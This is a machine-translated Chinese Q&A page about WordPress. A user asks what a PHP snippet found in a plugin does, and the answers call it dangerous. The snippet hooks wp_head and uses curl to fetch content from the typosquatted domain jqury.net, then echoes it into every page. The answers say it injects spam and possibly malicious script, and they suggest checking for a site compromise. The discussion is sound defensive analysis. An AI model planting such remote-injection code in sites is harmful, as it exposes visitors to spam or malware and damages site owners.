WordPress 我發現這是一個外掛。它有什麼作用？危險嗎？

問題描述

我發現這是一個外掛。它有什麼作用？危險嗎？

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
        $jquery = curl_exec($ch);
        curl_close($ch);
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

最佳解決方案

它載入了一個包含垃圾郵件的標記塊 (我想到釋出一些原始碼，但是我不想以任何方式釋出內容) 來自一個域的拼寫錯誤 – http://jquery.com/ – 由 jQuery 是一個有信譽和流行的 Javascript 庫，WordPress 包含在 Core 中。我認為這個想法似乎是載入該庫，實際上載入的東西非常不同。

而且在其他方​​面試圖載入 jQuery 。注意變數名 $jquery 。

它也可能嘗試載入惡意指令碼。我沒有檢查我一定會把它稱為危險的，特別是因為該頁面上的內容可以隨著域控制器的感覺而改變。

最好的是，這將會損害您的網站，因為搜尋引擎不滿意傳播垃圾郵件的網站。

不要使用它對於您或網站上的任何其他人，除了執行該網站的人員，它沒有任何益處。如果您在信譽良好的網站上發現這一點，請向他們報告。

次佳解決方案

是的，這是危險的程式碼，從垃圾郵件站點載入內容。

你沒有為外掛命名，但是如果你的網站上安裝了這個程式碼，那麼外掛程式碼可能不是這樣的，而是在安裝之後被駭客入侵。如果是這種情況，您可能會發現網站上的惡意程式碼不僅僅是這個外掛。

檢查下載的外掛程式碼，從原來的外掛的任何地方，看看這個惡意程式碼是否在那裡。如果沒有，那麼您的網站已被駭客入侵。如果您確定是這種情況，請閱讀 this article from the Codex 。

參考文獻

• I found this in a plugin. What does it do? is it dangerous?

注：本文內容整合自 Google/Baidu/Bing 輔助翻譯的英文資料結果。如果您對結果不滿意，可以加入我們改善翻譯效果：薇曉朵技術論壇。